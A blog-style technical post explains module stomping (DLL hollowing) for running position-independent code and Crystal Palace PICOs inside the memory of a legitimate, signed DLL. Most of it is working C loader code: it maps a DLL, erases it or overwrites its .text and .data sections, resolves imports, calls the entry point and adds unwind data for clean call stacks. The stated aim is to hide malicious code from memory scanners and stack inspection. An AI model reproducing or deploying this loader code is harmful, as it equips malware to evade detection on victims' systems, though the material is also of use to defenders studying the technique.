Module Stomping PIC
Module stomping (aka module overloading or DLL hollowing) is a technique for hiding malicious code within a process's memory. It essentially works by loading a legitimate DLL into memory and then overwriting its content. This helps the code appear to be a trusted, signed module backed by a file on disk, rather than injected into unbacked, private memory.
APIs like LoadLibraryEx and NtCreateSection/NtMapViewOfSection are some ways to achieve this. The following is an example of the latter:
BOOL loadDll( LPCWSTR dllPath, PVOID * module )
{
NTSTATUS status = 0;
HANDLE hFile = INVALID_HANDLE_VALUE;
HANDLE hSection = NULL;
PVOID baseAddress = NULL;
SIZE_T viewSize = 0;
hFile = KERNEL32$CreateFileW( dllPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL );
if ( hFile == INVALID_HANDLE_VALUE ) {
return FALSE;
}
status = NTDLL$NtCreateSection( &hSection, SECTION_ALL_ACCESS, NULL, NULL, PAGE_READONLY, SEC_IMAGE, hFile );
KERNEL32$CloseHandle( hFile );
if ( ! NT_SUCCESS( status ) ) {
return FALSE;
}
status = NTDLL$NtMapViewOfSection( hSection, (HANDLE)-1, &baseAddress, 0, 0, NULL, &viewSize, 2, 0, PAGE_READWRITE );
NTDLL$NtClose( hSection );
if ( ! NT_SUCCESS( status ) || !baseAddress ) {
return FALSE;
}
* module = baseAddress;
return TRUE;
}Once a module has been loaded, its memory permissions can be changed to RW and the current headers and sections erased.
/* parse DLL's headers */
DLLDATA module_data;
ParseDLL( (char *)module_base, &module_data );
/* erase the address space */
DWORD old_protect;
KERNEL32$VirtualProtect( module_base, SizeOfDLL( &module_data ), PAGE_READWRITE, &old_protect );
memset( module_base, 0, SizeOfDLL ( &module_data ) );Then another DLL can be written in its place, relocations and imports processed.
/* load dll into the module's address space */
LoadDLL( &dll_data, dll_src, module_base );
/* handle imports */
IMPORTFUNCS funcs;
funcs.LoadLibraryA = LoadLibraryA;
funcs.GetProcAddress = GetProcAddress;
ProcessImports( &funcs, &dll_data, module_base );
/* fix module permissions */
fixModulePermissions( &dll_data, module_base );And finally, its entry point called.
/* call entry point */
DLLMAIN_FUNC entry = EntryPoint( &dll_data, module_base );
entry( (HINSTANCE)module_base, DLL_PROCESS_ATTACH, NULL );
With a lot of capabilities moving to position-independent code (PIC), I was curious to see if a module stomping strategy can still makes sense when you're not stomping a DLL over another DLL.
PICOs
Position-Independent Code Objects (PICOs) are Crystal Palace's convention for running COFFs in memory. As the PE structure is based on COFF, COFFs have much of the same sections as a PE does - .text, .data, .rdata, etc. Crystal Palace only retains the data and code sections and throws everything else away.
The vanilla way to load a PICO is to allocate memory for the two sections and call its entry point or an exported function.
/* get pico appended to the loader */
char * pico_src = GETRESOURCE( __PICODATA__ );
/* alloc memory for data and code sections */
char * pico_data = KERNEL32$VirtualAlloc( NULL, PicoDataSize ( pico_src ), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );
char * pico_code = KERNEL32$VirtualAlloc( NULL, PicoCodeSize ( pico_src ), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );
/* load the pico into memory */
IMPORTFUNCS funcs;
funcs.LoadLibraryA = LoadLibraryA;
funcs.GetProcAddress = GetProcAddress;
PicoLoad( &funcs, pico_src, pico_code, pico_data );
/* code code section RX */
DWORD old_protect;
KERNEL32$VirtualProtect( pico_code, PicoCodeSize ( pico_src ), PAGE_EXECUTE_READ, &old_protect );
/* call its entry point */
PICOMAIN_FUNC entry = PicoEntryPoint( pico_src, pico_code );
entry( NULL );Calls to VirtualAlloc, HeapAlloc, etc, create private, unbacked regions. A stomping approach means you could overwrite the .text and .data sections of a DLL instead. We can do this by walking the PE sections until we find the two sections of interest, briefly record their virtual addresses and sizes, and overwrite them in memory.
DWORD text_va = 0;
DWORD text_vs = 0;
DWORD data_va = 0;
DWORD data_vs = 0;
/* find .text and .data sections */
getSectionByName( ".text", &module_data, &text_va, &text_vs );
getSectionByName( ".data", &module_data, &data_va, &data_vs );
/* get pico appended to the loader */
char * pico_src = GETRESOURCE( __PICODATA__ );
/* make .text section RW */
DWORD old_protect;
KERNEL32$VirtualProtect( module_base + text_va, text_vs, PAGE_READWRITE, &old_protect );
/* load the pico into memory */
IMPORTFUNCS funcs;
funcs.LoadLibraryA = LoadLibraryA;
funcs.GetProcAddress = GetProcAddress;
PicoLoad( &funcs, pico_src, module_base + text_va, module_base + data_va );
/* make .text section RX */
KERNEL32$VirtualProtect( module_base + text_va, text_vs, PAGE_EXECUTE_READ, &old_protect );
/* call its entry point */
PICOMAIN_FUNC entry = PicoEntryPoint( pico_src, module_base + text_va );
entry( NULL );PIC
Crystal Palace structures PIC a little differently than a PICO. The blob begins with its executable code and any data is appended to the end. All of the associated code<->data plumping is done at link-time, rather than at runtime as with a PICO (PicoLoad in LibTCG handles that).
Crystal Palace PIC has a convention for restoring access to global variables via the fixbss command. The TCG PIC example look for slack RW space and uses that for the .bss data. Instead of slack space, my thought was to stomp PIC into the .text section of a DLL and use its RW .data section for .bss instead.
char * getBSS( DWORD length )
{
MEMORY_BASIC_INFORMATION mbi = { 0 };
KERNEL32$VirtualQuery( ( LPCVOID ) getBSS, &mbi, sizeof ( mbi ) );
char * dll_base = ( char * ) mbi.AllocationBase;
DWORD va = 0;
DWORD vs = 0;
DLLDATA dll_data;
ParseDLL( dll_base, &dll_data );
getSectionByName( ".data", &dll_data, &va, &vs );
if ( vs < length )
{
/* too bad */
return NULL;
}
return dll_base + va;
}Since this implementation uses the DLL headers to find the various sections, it wouldn't work if those had been erased.
Unwind data
This section is the bulk of the update to this post as I didn't feel like writing a whole new one. Shortly after the original post, Crystal Palace got an update, making unwind data available in both PIC and PICOs.
PIC
Crystal Palace's convention for appending data to PIC is via gcc's section attributes. We generally use this to append a DLL or PICO to a loader, e.g. char __PICODATA__[ 0 ] __attribute__(( section( "pico" ) )); but you can append anything you like in a spec file. This means you can define a section like: char __UNWINDDATA__[ 0 ] __attribute__(( section( "unwind_data" ) )); and then add the following to the spec file: linkpost "unwind_data" "unwind". This will appended .pdata/.xdata as _RESOURCE structures, which are now included in tcg.h.
PICOs
With the make object +unwind command, Crystal Palace will pack .pdata/.xdata into the PICO before it's appended to a loader. There's also a new function in tcg.h called PicoGetUnwindData that's used to recover it: _RESOURCE * pico_pdata = (_RESOURCE *)PicoGetUnwindData( pico_src, pico_code );.
Conclusion
Unwind data is particularly useful when combined with module stomping because it helps provide clean call stacks without the need for complicated spoofing techniques. When I first wrote this post, I left out a section lamenting how cool unwind data would be with PIC but ultimately left it out. Little did I know Raffi had already solved it.
